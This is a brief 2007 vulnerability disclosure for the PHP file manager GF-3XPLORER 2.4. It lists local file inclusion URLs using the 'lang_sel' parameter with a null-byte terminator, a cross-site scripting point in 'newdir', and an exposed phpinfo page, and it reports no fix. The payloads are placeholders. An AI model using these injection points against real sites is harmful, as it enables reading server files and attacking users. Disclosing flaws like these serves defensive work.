GF-3XPLORER 2.4 (XSS-LFI-Etc.) Multiple Remote Vulnerabilities

2007-12-18 00:00:00

---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

Local File Inclusion & Full Path Discolusure

---------------------------------------------------------------

# Author: MhZ91 [email protected]

# Download script: http://sourceforge.net/projects/gf-3xplorer/

# magic_quotes_gpc = Off

# Exploit

# http://[site]/[path]/updater.php?lang_sel=[LFI]%00

# http://[site]/[path]/thumber.php?lang_sel=[LFI]%00

---------------------------------------------------------------

# Xss

# http://[site]/[path]/index_3x.php?newdir=">[Xss]

# And other more..

---------------------------------------------------------------

# phpinfo(); View

# http://[site]/GF-3XPLORER/explorer/phpinfo.php

---------------------------------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.